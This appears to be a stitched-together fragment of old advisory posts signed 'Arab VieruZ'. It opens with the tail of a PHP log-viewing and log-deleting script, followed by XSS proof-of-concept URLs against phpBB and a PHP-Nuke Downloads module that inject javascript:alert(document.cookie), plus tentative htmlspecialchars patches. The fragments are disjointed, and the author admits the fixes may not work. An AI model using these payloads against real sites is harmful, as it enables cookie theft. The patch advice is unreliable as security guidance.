Print ("\n");
Print (".:: Records\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("" . $Line[0] . ": " . $Line[1]);
}
}
Print ("");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("Deleted Succsesfuly")
Or Die ("Error: Cannot Delete Log");
Print ("");
Break;
}
?>
-
Arab VieruZ
thanX
Vulnerable systems:
The Last ver
Exploit:
http://phpbb.com/phpBB/viewtopic.php?
t=17071&highlight=">"javascript:alert(document.cookie)
(without "*")
Solution:
i think that will work , but im not sure
open viewtopic.php and put this code
$highlight = htmlspecialchars($highlight)
n URL like this
http://[traget]/modules.php?
name=Downloads&d_op=search&query=javascript:alert(document.cookie)
it will write "I don't like you..." me 2 :)
--
Arab Vieruz
thanx
nd put this code in line 7:
$class = HTMLSpecialChars($class);
i'm a beginer php developer sry :)
------
Arab Vieruz
thanx
;
$go = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go);
--
Arab Vieruz
thanx
